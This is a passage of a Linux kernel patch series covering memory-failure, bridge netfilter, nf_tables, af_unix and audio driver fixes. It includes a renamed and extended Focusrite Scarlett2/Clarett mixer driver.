+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -84,11 +84,23 @@ static int __page_handle_poison(struct page *page)
+ {
+ 	int ret;
+ 
+-	zone_pcp_disable(page_zone(page));
++	/*
++	 * zone_pcp_disable() can't be used here. It will
++	 * hold pcp_batch_high_lock and dissolve_free_huge_page() might hold
++	 * cpu_hotplug_lock via static_key_slow_dec() when hugetlb vmemmap
++	 * optimization is enabled. This will break current lock dependency
++	 * chain and leads to deadlock.
++	 * Disabling pcp before dissolving the page was a deterministic
++	 * approach because we made sure that those pages cannot end up in any
++	 * PCP list. Draining PCP lists expels those pages to the buddy system,
++	 * but nothing guarantees that those pages do not get back to a PCP
++	 * queue if we need to refill those.
++	 */
+ 	ret = dissolve_free_huge_page(page);
+-	if (!ret)
++	if (!ret) {
++		drain_all_pages(page_zone(page));
+ 		ret = take_page_off_buddy(page);
+-	zone_pcp_enable(page_zone(page));
++	}
+ 
+ 	return ret;
+ }
+diff --git a/net/bridge/br_input.c b/net/bridge/br_input.c
+index 6bb272894c960..b94a1783902ea 100644
+--- a/net/bridge/br_input.c
++++ b/net/bridge/br_input.c
+@@ -30,7 +30,7 @@ br_netif_receive_skb(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 	return netif_receive_skb(skb);
+ }
+ 
+-static int br_pass_frame_up(struct sk_buff *skb)
++static int br_pass_frame_up(struct sk_buff *skb, bool promisc)
+ {
+ 	struct net_device *indev, *brdev = BR_INPUT_SKB_CB(skb)->brdev;
+ 	struct net_bridge *br = netdev_priv(brdev);
+@@ -65,6 +65,8 @@ static int br_pass_frame_up(struct sk_buff *skb)
+ 	br_multicast_count(br, NULL, skb, br_multicast_igmp_type(skb),
+ 			   BR_MCAST_DIR_TX);
+ 
++	BR_INPUT_SKB_CB(skb)->promisc = promisc;
++
+ 	return NF_HOOK(NFPROTO_BRIDGE, NF_BR_LOCAL_IN,
+ 		       dev_net(indev), NULL, skb, indev, NULL,
+ 		       br_netif_receive_skb);
+@@ -82,6 +84,7 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	struct net_bridge_mcast *brmctx;
+ 	struct net_bridge_vlan *vlan;
+ 	struct net_bridge *br;
++	bool promisc;
+ 	u16 vid = 0;
+ 	u8 state;
+ 
+@@ -120,7 +123,9 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	if (p->flags & BR_LEARNING)
+ 		br_fdb_update(br, p, eth_hdr(skb)->h_source, vid, 0);
+ 
+-	local_rcv = !!(br->dev->flags & IFF_PROMISC);
++	promisc = !!(br->dev->flags & IFF_PROMISC);
++	local_rcv = promisc;
++
+ 	if (is_multicast_ether_addr(eth_hdr(skb)->h_dest)) {
+ 		/* by definition the broadcast is also a multicast address */
+ 		if (is_broadcast_ether_addr(eth_hdr(skb)->h_dest)) {
+@@ -183,7 +188,7 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 		unsigned long now = jiffies;
+ 
+ 		if (test_bit(BR_FDB_LOCAL, &dst->flags))
+-			return br_pass_frame_up(skb);
++			return br_pass_frame_up(skb, false);
+ 
+ 		if (now != dst->used)
+ 			dst->used = now;
+@@ -196,7 +201,7 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	}
+ 
+ 	if (local_rcv)
+-		return br_pass_frame_up(skb);
++		return br_pass_frame_up(skb, promisc);
+ 
+ out:
+ 	return 0;
+@@ -368,6 +373,8 @@ static rx_handler_result_t br_handle_frame(struct sk_buff **pskb)
+ 				goto forward;
+ 		}
+ 
++		BR_INPUT_SKB_CB(skb)->promisc = false;
++
+ 		/* The else clause should be hit when nf_hook():
+ 		 *   - returns < 0 (drop/error)
+ 		 *   - returns = 0 (stolen/nf_queue)
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index bff48d5763635..9ac70c27da835 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -600,11 +600,17 @@ static unsigned int br_nf_local_in(void *priv,
+ 				   struct sk_buff *skb,
+ 				   const struct nf_hook_state *state)
+ {
++	bool promisc = BR_INPUT_SKB_CB(skb)->promisc;
+ 	struct nf_conntrack *nfct = skb_nfct(skb);
+ 	const struct nf_ct_hook *ct_hook;
+ 	struct nf_conn *ct;
+ 	int ret;
+ 
++	if (promisc) {
++		nf_reset_ct(skb);
++		return NF_ACCEPT;
++	}
++
+ 	if (!nfct || skb->pkt_type == PACKET_HOST)
+ 		return NF_ACCEPT;
+ 
+diff --git a/net/bridge/br_private.h b/net/bridge/br_private.h
+index 51d010f64e066..940de95167689 100644
+--- a/net/bridge/br_private.h
++++ b/net/bridge/br_private.h
+@@ -559,6 +559,7 @@ struct br_input_skb_cb {
+ #endif
+ 	u8 proxyarp_replied:1;
+ 	u8 src_port_isolated:1;
++	u8 promisc:1;
+ #ifdef CONFIG_BRIDGE_VLAN_FILTERING
+ 	u8 vlan_filtered:1;
+ #endif
+diff --git a/net/bridge/netfilter/nf_conntrack_bridge.c b/net/bridge/netfilter/nf_conntrack_bridge.c
+index c7c27ada67044..e60c38670f220 100644
+--- a/net/bridge/netfilter/nf_conntrack_bridge.c
++++ b/net/bridge/netfilter/nf_conntrack_bridge.c
+@@ -294,18 +294,24 @@ static unsigned int nf_ct_bridge_pre(void *priv, struct sk_buff *skb,
+ static unsigned int nf_ct_bridge_in(void *priv, struct sk_buff *skb,
+ 				    const struct nf_hook_state *state)
+ {
+-	enum ip_conntrack_info ctinfo;
++	bool promisc = BR_INPUT_SKB_CB(skb)->promisc;
++	struct nf_conntrack *nfct = skb_nfct(skb);
+ 	struct nf_conn *ct;
+ 
+-	if (skb->pkt_type == PACKET_HOST)
++	if (promisc) {
++		nf_reset_ct(skb);
++		return NF_ACCEPT;
++	}
++
++	if (!nfct || skb->pkt_type == PACKET_HOST)
+ 		return NF_ACCEPT;
+ 
+ 	/* nf_conntrack_confirm() cannot handle concurrent clones,
+ 	 * this happens for broad/multicast frames with e.g. macvlan on top
+ 	 * of the bridge device.
+ 	 */
+-	ct = nf_ct_get(skb, &ctinfo);
+-	if (!ct || nf_ct_is_confirmed(ct) || nf_ct_is_template(ct))
++	ct = container_of(nfct, struct nf_conn, ct_general);
++	if (nf_ct_is_confirmed(ct) || nf_ct_is_template(ct))
+ 		return NF_ACCEPT;
+ 
+ 	/* let inet prerouting call conntrack again */
+diff --git a/net/dsa/dsa2.c b/net/dsa/dsa2.c
+index 5417f7b1187cb..98f8648791755 100644
+--- a/net/dsa/dsa2.c
++++ b/net/dsa/dsa2.c
+@@ -425,6 +425,24 @@ static int dsa_tree_setup_default_cpu(struct dsa_switch_tree *dst)
+ 	return 0;
+ }
+ 
++static struct dsa_port *
++dsa_switch_preferred_default_local_cpu_port(struct dsa_switch *ds)
++{
++	struct dsa_port *cpu_dp;
++
++	if (!ds->ops->preferred_default_local_cpu_port)
++		return NULL;
++
++	cpu_dp = ds->ops->preferred_default_local_cpu_port(ds);
++	if (!cpu_dp)
++		return NULL;
++
++	if (WARN_ON(!dsa_port_is_cpu(cpu_dp) || cpu_dp->ds != ds))
++		return NULL;
++
++	return cpu_dp;
++}
++
+ /* Perform initial assignment of CPU ports to user ports and DSA links in the
+  * fabric, giving preference to CPU ports local to each switch. Default to
+  * using the first CPU port in the switch tree if the port does not have a CPU
+@@ -432,12 +450,16 @@ static int dsa_tree_setup_default_cpu(struct dsa_switch_tree *dst)
+  */
+ static int dsa_tree_setup_cpu_ports(struct dsa_switch_tree *dst)
+ {
+-	struct dsa_port *cpu_dp, *dp;
++	struct dsa_port *preferred_cpu_dp, *cpu_dp, *dp;
+ 
+ 	list_for_each_entry(cpu_dp, &dst->ports, list) {
+ 		if (!dsa_port_is_cpu(cpu_dp))
+ 			continue;
+ 
++		preferred_cpu_dp = dsa_switch_preferred_default_local_cpu_port(cpu_dp->ds);
++		if (preferred_cpu_dp && preferred_cpu_dp != cpu_dp)
++			continue;
++
+ 		/* Prefer a local CPU port */
+ 		dsa_switch_for_each_port(dp, cpu_dp->ds) {
+ 			/* Prefer the first local CPU port found */
+diff --git a/net/netfilter/nf_flow_table_inet.c b/net/netfilter/nf_flow_table_inet.c
+index 9505f9d188ff2..6eef15648b7b0 100644
+--- a/net/netfilter/nf_flow_table_inet.c
++++ b/net/netfilter/nf_flow_table_inet.c
+@@ -21,7 +21,8 @@ nf_flow_offload_inet_hook(void *priv, struct sk_buff *skb,
+ 		proto = veth->h_vlan_encapsulated_proto;
+ 		break;
+ 	case htons(ETH_P_PPP_SES):
+-		proto = nf_flow_pppoe_proto(skb);
++		if (!nf_flow_pppoe_proto(skb, &proto))
++			return NF_ACCEPT;
+ 		break;
+ 	default:
+ 		proto = skb->protocol;
+diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
+index 6feaac9ab05c8..22bc0e3d8a0b5 100644
+--- a/net/netfilter/nf_flow_table_ip.c
++++ b/net/netfilter/nf_flow_table_ip.c
+@@ -156,7 +156,7 @@ static void nf_flow_tuple_encap(struct sk_buff *skb,
+ 		tuple->encap[i].proto = skb->protocol;
+ 		break;
+ 	case htons(ETH_P_PPP_SES):
+-		phdr = (struct pppoe_hdr *)skb_mac_header(skb);
++		phdr = (struct pppoe_hdr *)skb_network_header(skb);
+ 		tuple->encap[i].id = ntohs(phdr->sid);
+ 		tuple->encap[i].proto = skb->protocol;
+ 		break;
+@@ -267,10 +267,11 @@ static unsigned int nf_flow_xmit_xfrm(struct sk_buff *skb,
+ 	return NF_STOLEN;
+ }
+ 
+-static bool nf_flow_skb_encap_protocol(const struct sk_buff *skb, __be16 proto,
++static bool nf_flow_skb_encap_protocol(struct sk_buff *skb, __be16 proto,
+ 				       u32 *offset)
+ {
+ 	struct vlan_ethhdr *veth;
++	__be16 inner_proto;
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_8021Q):
+@@ -281,7 +282,8 @@ static bool nf_flow_skb_encap_protocol(const struct sk_buff *skb, __be16 proto,
+ 		}
+ 		break;
+ 	case htons(ETH_P_PPP_SES):
+-		if (nf_flow_pppoe_proto(skb) == proto) {
++		if (nf_flow_pppoe_proto(skb, &inner_proto) &&
++		    inner_proto == proto) {
+ 			*offset += PPPOE_SES_HLEN;
+ 			return true;
+ 		}
+@@ -310,7 +312,7 @@ static void nf_flow_encap_pop(struct sk_buff *skb,
+ 			skb_reset_network_header(skb);
+ 			break;
+ 		case htons(ETH_P_PPP_SES):
+-			skb->protocol = nf_flow_pppoe_proto(skb);
++			skb->protocol = __nf_flow_pppoe_proto(skb);
+ 			skb_pull(skb, PPPOE_SES_HLEN);
+ 			skb_reset_network_header(skb);
+ 			break;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8152a69d82681..1c4b7a8ec2cc6 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -2891,7 +2891,7 @@ static const struct nft_expr_type *__nft_expr_type_get(u8 family,
+ {
+ 	const struct nft_expr_type *type, *candidate = NULL;
+ 
+-	list_for_each_entry(type, &nf_tables_expressions, list) {
++	list_for_each_entry_rcu(type, &nf_tables_expressions, list) {
+ 		if (!nla_strcmp(nla, type->name)) {
+ 			if (!type->family && !candidate)
+ 				candidate = type;
+@@ -2923,9 +2923,13 @@ static const struct nft_expr_type *nft_expr_type_get(struct net *net,
+ 	if (nla == NULL)
+ 		return ERR_PTR(-EINVAL);
+ 
++	rcu_read_lock();
+ 	type = __nft_expr_type_get(family, nla);
+-	if (type != NULL && try_module_get(type->owner))
++	if (type != NULL && try_module_get(type->owner)) {
++		rcu_read_unlock();
+ 		return type;
++	}
++	rcu_read_unlock();
+ 
+ 	lockdep_nfnl_nft_mutex_not_held();
+ #ifdef CONFIG_MODULES
+@@ -7171,7 +7175,7 @@ static const struct nft_object_type *__nft_obj_type_get(u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
+-	list_for_each_entry(type, &nf_tables_objects, list) {
++	list_for_each_entry_rcu(type, &nf_tables_objects, list) {
+ 		if (type->family != NFPROTO_UNSPEC &&
+ 		    type->family != family)
+ 			continue;
+@@ -7187,9 +7191,13 @@ nft_obj_type_get(struct net *net, u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
++	rcu_read_lock();
+ 	type = __nft_obj_type_get(objtype, family);
+-	if (type != NULL && try_module_get(type->owner))
++	if (type != NULL && try_module_get(type->owner)) {
++		rcu_read_unlock();
+ 		return type;
++	}
++	rcu_read_unlock();
+ 
+ 	lockdep_nfnl_nft_mutex_not_held();
+ #ifdef CONFIG_MODULES
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 58eca26162735..2299ced939c47 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1994,6 +1994,8 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 		rules_fx = rules_f0;
+ 
+ 		nft_pipapo_for_each_field(f, i, m) {
++			bool last = i == m->field_count - 1;
++
+ 			if (!pipapo_match_field(f, start, rules_fx,
+ 						match_start, match_end))
+ 				break;
+@@ -2006,16 +2008,18 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 
+ 			match_start += NFT_PIPAPO_GROUPS_PADDED_SIZE(f);
+ 			match_end += NFT_PIPAPO_GROUPS_PADDED_SIZE(f);
+-		}
+ 
+-		if (i == m->field_count) {
+-			priv->dirty = true;
+-			pipapo_drop(m, rulemap);
+-			return;
++			if (last && f->mt[rulemap[i].to].e == e) {
++				priv->dirty = true;
++				pipapo_drop(m, rulemap);
++				return;
++			}
+ 		}
+ 
+ 		first_rule += rules_f0;
+ 	}
++
++	WARN_ON_ONCE(1); /* elem_priv not found */
+ }
+ 
+ /**
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 0a75d76535f75..f28e2956fea58 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2675,7 +2675,9 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 					WRITE_ONCE(u->oob_skb, NULL);
+ 					consume_skb(skb);
+ 				}
+-			} else if (!(flags & MSG_PEEK)) {
++			} else if (flags & MSG_PEEK) {
++				skb = NULL;
++			} else {
+ 				skb_unlink(skb, &sk->sk_receive_queue);
+ 				WRITE_ONCE(u->oob_skb, NULL);
+ 				if (!WARN_ON_ONCE(skb_unref(skb)))
+@@ -2753,18 +2755,16 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
+ 		last = skb = skb_peek(&sk->sk_receive_queue);
+ 		last_len = last ? last->len : 0;
+ 
++again:
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+ 		if (skb) {
+ 			skb = manage_oob(skb, sk, flags, copied);
+-			if (!skb) {
++			if (!skb && copied) {
+ 				unix_state_unlock(sk);
+-				if (copied)
+-					break;
+-				goto redo;
++				break;
+ 			}
+ 		}
+ #endif
+-again:
+ 		if (skb == NULL) {
+ 			if (copied >= target)
+ 				goto unlock;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e8cf38dc8a5e0..77c40063d63a7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10122,6 +10122,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d05, 0x115c, "TongFang GMxTGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x121b, "TongFang GMxAGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x1387, "TongFang GMxIXxx", ALC2XX_FIXUP_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1d17, 0x3288, "Haier Boyue G42", ALC269VC_FIXUP_ACER_VCOPPERBOX_PINS),
+ 	SND_PCI_QUIRK(0x1d72, 0x1602, "RedmiBook", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1701, "XiaomiNotebook Pro", ALC298_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+diff --git a/sound/soc/ti/omap3pandora.c b/sound/soc/ti/omap3pandora.c
+index a287e9747c2a1..fa92ed97dfe3b 100644
+--- a/sound/soc/ti/omap3pandora.c
++++ b/sound/soc/ti/omap3pandora.c
+@@ -7,7 +7,7 @@
+ 
+ #include <linux/clk.h>
+ #include <linux/platform_device.h>
+-#include <linux/gpio.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/delay.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/module.h>
+@@ -21,12 +21,11 @@
+ 
+ #include "omap-mcbsp.h"
+ 
+-#define OMAP3_PANDORA_DAC_POWER_GPIO	118
+-#define OMAP3_PANDORA_AMP_POWER_GPIO	14
+-
+ #define PREFIX "ASoC omap3pandora: "
+ 
+ static struct regulator *omap3pandora_dac_reg;
++static struct gpio_desc *dac_power_gpio;
++static struct gpio_desc *amp_power_gpio;
+ 
+ static int omap3pandora_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_pcm_hw_params *params)
+@@ -78,9 +77,9 @@ static int omap3pandora_dac_event(struct snd_soc_dapm_widget *w,
+ 			return ret;
+ 		}
+ 		mdelay(1);
+-		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 1);
++		gpiod_set_value(dac_power_gpio, 1);
+ 	} else {
+-		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
++		gpiod_set_value(dac_power_gpio, 0);
+ 		mdelay(1);
+ 		regulator_disable(omap3pandora_dac_reg);
+ 	}
+@@ -92,9 +91,9 @@ static int omap3pandora_hp_event(struct snd_soc_dapm_widget *w,
+ 	struct snd_kcontrol *k, int event)
+ {
+ 	if (SND_SOC_DAPM_EVENT_ON(event))
+-		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 1);
++		gpiod_set_value(amp_power_gpio, 1);
+ 	else
+-		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
++		gpiod_set_value(amp_power_gpio, 0);
+ 
+ 	return 0;
+ }
+@@ -229,35 +228,10 @@ static int __init omap3pandora_soc_init(void)
+ 
+ 	pr_info("OMAP3 Pandora SoC init\n");
+ 
+-	ret = gpio_request(OMAP3_PANDORA_DAC_POWER_GPIO, "dac_power");
+-	if (ret) {
+-		pr_err(PREFIX "Failed to get DAC power GPIO\n");
+-		return ret;
+-	}
+-
+-	ret = gpio_direction_output(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
+-	if (ret) {
+-		pr_err(PREFIX "Failed to set DAC power GPIO direction\n");
+-		goto fail0;
+-	}
+-
+-	ret = gpio_request(OMAP3_PANDORA_AMP_POWER_GPIO, "amp_power");
+-	if (ret) {
+-		pr_err(PREFIX "Failed to get amp power GPIO\n");
+-		goto fail0;
+-	}
+-
+-	ret = gpio_direction_output(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
+-	if (ret) {
+-		pr_err(PREFIX "Failed to set amp power GPIO direction\n");
+-		goto fail1;
+-	}
+-
+ 	omap3pandora_snd_device = platform_device_alloc("soc-audio", -1);
+ 	if (omap3pandora_snd_device == NULL) {
+ 		pr_err(PREFIX "Platform device allocation failed\n");
+-		ret = -ENOMEM;
+-		goto fail1;
++		return -ENOMEM;
+ 	}
+ 
+ 	platform_set_drvdata(omap3pandora_snd_device, &snd_soc_card_omap3pandora);
+@@ -268,6 +242,20 @@ static int __init omap3pandora_soc_init(void)
+ 		goto fail2;
+ 	}
+ 
++	dac_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
++					"dac", GPIOD_OUT_LOW);
++	if (IS_ERR(dac_power_gpio)) {
++		ret = PTR_ERR(dac_power_gpio);
++		goto fail3;
++	}
++
++	amp_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
++					"amp", GPIOD_OUT_LOW);
++	if (IS_ERR(amp_power_gpio)) {
++		ret = PTR_ERR(amp_power_gpio);
++		goto fail3;
++	}
++
+ 	omap3pandora_dac_reg = regulator_get(&omap3pandora_snd_device->dev, "vcc");
+ 	if (IS_ERR(omap3pandora_dac_reg)) {
+ 		pr_err(PREFIX "Failed to get DAC regulator from %s: %ld\n",
+@@ -283,10 +271,7 @@ static int __init omap3pandora_soc_init(void)
+ 	platform_device_del(omap3pandora_snd_device);
+ fail2:
+ 	platform_device_put(omap3pandora_snd_device);
+-fail1:
+-	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
+-fail0:
+-	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
++
+ 	return ret;
+ }
+ module_init(omap3pandora_soc_init);
+@@ -295,8 +280,6 @@ static void __exit omap3pandora_soc_exit(void)
+ {
+ 	regulator_put(omap3pandora_dac_reg);
+ 	platform_device_unregister(omap3pandora_snd_device);
+-	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
+-	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
+ }
+ module_exit(omap3pandora_soc_exit);
+ 
+diff --git a/sound/usb/Makefile b/sound/usb/Makefile
+index 9ccb21a4ff8a8..64a718c766a7a 100644
+--- a/sound/usb/Makefile
++++ b/sound/usb/Makefile
+@@ -12,7 +12,7 @@ snd-usb-audio-objs := 	card.o \
+ 			mixer.o \
+ 			mixer_quirks.o \
+ 			mixer_scarlett.o \
+-			mixer_scarlett_gen2.o \
++			mixer_scarlett2.o \
+ 			mixer_us16x08.o \
+ 			mixer_s1810c.o \
+ 			pcm.o \
+diff --git a/sound/usb/mixer_quirks.c b/sound/usb/mixer_quirks.c
+index 1f32e3ae3aa31..c8d48566e1759 100644
+--- a/sound/usb/mixer_quirks.c
++++ b/sound/usb/mixer_quirks.c
+@@ -33,7 +33,7 @@
+ #include "mixer.h"
+ #include "mixer_quirks.h"
+ #include "mixer_scarlett.h"
+-#include "mixer_scarlett_gen2.h"
++#include "mixer_scarlett2.h"
+ #include "mixer_us16x08.h"
+ #include "mixer_s1810c.h"
+ #include "helper.h"
+@@ -3447,8 +3447,13 @@ int snd_usb_mixer_apply_create_quirk(struct usb_mixer_interface *mixer)
+ 	case USB_ID(0x1235, 0x8213): /* Focusrite Scarlett 8i6 3rd Gen */
+ 	case USB_ID(0x1235, 0x8214): /* Focusrite Scarlett 18i8 3rd Gen */
+ 	case USB_ID(0x1235, 0x8215): /* Focusrite Scarlett 18i20 3rd Gen */
++	case USB_ID(0x1235, 0x8206): /* Focusrite Clarett 2Pre USB */
++	case USB_ID(0x1235, 0x8207): /* Focusrite Clarett 4Pre USB */
++	case USB_ID(0x1235, 0x8208): /* Focusrite Clarett 8Pre USB */
++	case USB_ID(0x1235, 0x820a): /* Focusrite Clarett+ 2Pre */
++	case USB_ID(0x1235, 0x820b): /* Focusrite Clarett+ 4Pre */
+ 	case USB_ID(0x1235, 0x820c): /* Focusrite Clarett+ 8Pre */
+-		err = snd_scarlett_gen2_init(mixer);
++		err = snd_scarlett2_init(mixer);
+ 		break;
+ 
+ 	case USB_ID(0x041e, 0x323b): /* Creative Sound Blaster E1 */
+diff --git a/sound/usb/mixer_scarlett2.c b/sound/usb/mixer_scarlett2.c
+new file mode 100644
+index 0000000000000..bcb8b76174065
+--- /dev/null
++++ b/sound/usb/mixer_scarlett2.c
+@@ -0,0 +1,4391 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *   Focusrite Scarlett 2 Protocol Driver for ALSA
++ *   (including Scarlett 2nd Gen, 3rd Gen, Clarett USB, and Clarett+
++ *   series products)
++ *
++ *   Supported models:
++ *   - 6i6/18i8/18i20 Gen 2
++ *   - Solo/2i2/4i4/8i6/18i8/18i20 Gen 3
++ *   - Clarett 2Pre/4Pre/8Pre USB
++ *   - Clarett+ 2Pre/4Pre/8Pre
++ *
++ *   Copyright (c) 2018-2023 by Geoffrey D. Bennett <g at b4.vu>
++ *   Copyright (c) 2020-2021 by Vladimir Sadovnikov <sadko4u@gmail.com>
++ *   Copyright (c) 2022 by Christian Colglazier <christian@cacolglazier.com>
++ *
++ *   Based on the Scarlett (Gen 1) Driver for ALSA:
++ *
++ *   Copyright (c) 2013 by Tobias Hoffmann
++ *   Copyright (c) 2013 by Robin Gareus <robin at gareus.org>
++ *   Copyright (c) 2002 by Takashi Iwai <tiwai at suse.de>
++ *   Copyright (c) 2014 by Chris J Arges <chris.j.arges at canonical.com>
++ *
++ *   Many codes borrowed from audio.c by
++ *     Alan Cox (alan at lxorguk.ukuu.org.uk)
++ *     Thomas Sailer (sailer at ife.ee.ethz.ch)
++ *
++ *   Code cleanup:
++ *   David Henningsson <david.henningsson at canonical.com>
++ */
++
++/* The protocol was reverse engineered by looking at the communication
++ * between Focusrite Control 2.3.4 and the Focusrite(R) Scarlett 18i20
++ * (firmware 1083) using usbmon in July-August 2018.
++ *
++ * Scarlett 18i8 support added in April 2019.
++ *
++ * Scarlett 6i6 support added in June 2019 (thanks to Martin Wittmann
++ * for providing usbmon output and testing).
++ *
++ * Scarlett 4i4/8i6 Gen 3 support added in May 2020 (thanks to Laurent
++ * Debricon for donating a 4i4 and to Fredrik Unger for providing 8i6
++ * usbmon output and testing).
++ *
++ * Scarlett 18i8/18i20 Gen 3 support added in June 2020 (thanks to
++ * Darren Jaeckel, Alex Sedlack, and Clovis Lunel for providing usbmon
++ * output, protocol traces and testing).
++ *
++ * Support for loading mixer volume and mux configuration from the
++ * interface during driver initialisation added in May 2021 (thanks to
++ * Vladimir Sadovnikov for figuring out how).
++ *
++ * Support for Solo/2i2 Gen 3 added in May 2021 (thanks to Alexander
++ * Vorona for 2i2 protocol traces).
++ *
++ * Support for phantom power, direct monitoring, speaker switching,
++ * and talkback added in May-June 2021.
++ *
++ * Support for Clarett+ 8Pre added in Aug 2022 by Christian
++ * Colglazier.
++ *
++ * Support for Clarett 8Pre USB added in Sep 2023 (thanks to Philippe
++ * Perrot for confirmation).
++ *
++ * Support for Clarett+ 4Pre and 2Pre added in Sep 2023 (thanks to
++ * Gregory Rozzo for donating a 4Pre, and David Sherwood and Patrice
++ * Peterson for usbmon output).
++ *
++ * Support for Clarett 2Pre and 4Pre USB added in Oct 2023.
++ *
++ * This ALSA mixer gives access to (model-dependent):
++ *  - input, output, mixer-matrix muxes
++ *  - mixer-matrix gain stages
++ *  - gain/volume/mute controls
++ *  - level meters
++ *  - line/inst level, pad, and air controls
++ *  - phantom power, direct monitor, speaker switching, and talkback
++ *    controls
++ *  - disable/enable MSD mode
++ *  - disable/enable standalone mode
++ *
++ * <ditaa>
++ *    /--------------\    18chn            20chn     /--------------\
++ *    | Hardware  in +--+------\    /-------------+--+ ALSA PCM out |
++ *    \--------------/  |      |    |             |  \--------------/
++ *                      |      |    |    /-----\  |
++ *                      |      |    |    |     |  |
++ *                      |      v    v    v     |  |
++ *                      |   +---------------+  |  |
++ *                      |    \ Matrix  Mux /   |  |
++ *                      |     +-----+-----+    |  |
++ *                      |           |          |  |
++ *                      |           |18chn     |  |
++ *                      |           |          |  |
++ *                      |           |     10chn|  |
++ *                      |           v          |  |
++ *                      |     +------------+   |  |
++ *                      |     | Mixer      |   |  |
++ *                      |     |     Matrix |   |  |
++ *                      |     |            |   |  |
++ *                      |     | 18x10 Gain |   |  |
++ *                      |     |   stages   |   |  |
++ *                      |     +-----+------+   |  |
++ *                      |           |          |  |
++ *                      |18chn      |10chn     |  |20chn
++ *                      |           |          |  |
++ *                      |           +----------/  |
++ *                      |           |             |
++ *                      v           v             v
++ *                      ===========================
++ *               +---------------+       +--—------------+
++ *                \ Output  Mux /         \ Capture Mux /
++ *                 +---+---+---+           +-----+-----+
++ *                     |   |                     |
++ *                10chn|   |                     |18chn
++ *                     |   |                     |
++ *  /--------------\   |   |                     |   /--------------\
++ *  | S/PDIF, ADAT |<--/   |10chn                \-->| ALSA PCM in  |
++ *  | Hardware out |       |                         \--------------/
++ *  \--------------/       |
++ *                         v
++ *                  +-------------+    Software gain per channel.
++ *                  | Master Gain |<-- 18i20 only: Switch per channel
++ *                  +------+------+    to select HW or SW gain control.
++ *                         |
++ *                         |10chn
++ *  /--------------\       |
++ *  | Analogue     |<------/
++ *  | Hardware out |
++ *  \--------------/
++ * </ditaa>
++ *
++ * Gen 3 devices have a Mass Storage Device (MSD) mode where a small
++ * disk with registration and driver download information is presented
++ * to the host. To access the full functionality of the device without
++ * proprietary software, MSD mode can be disabled by:
++ * - holding down the 48V button for five seconds while powering on
++ *   the device, or
++ * - using this driver and alsamixer to change the "MSD Mode" setting
++ *   to Off and power-cycling the device
++ */
++
++#include <linux/slab.h>
++#include <linux/usb.h>
++#include <linux/moduleparam.h>
++
++#include <sound/control.h>
++#include <sound/tlv.h>
++
++#include "usbaudio.h"
++#include "mixer.h"
++#include "helper.h"
++
++#include "mixer_scarlett2.h"
++
++/* device_setup value to allow turning MSD mode back on */
++#define SCARLETT2_MSD_ENABLE 0x02
++
++/* device_setup value to disable this mixer driver */
++#define SCARLETT2_DISABLE 0x04
++
++/* some gui mixers can't handle negative ctl values */
++#define SCARLETT2_VOLUME_BIAS 127
++
++/* mixer range from -80dB to +6dB in 0.5dB steps */
++#define SCARLETT2_MIXER_MIN_DB -80
++#define SCARLETT2_MIXER_BIAS (-SCARLETT2_MIXER_MIN_DB * 2)
++#define SCARLETT2_MIXER_MAX_DB 6
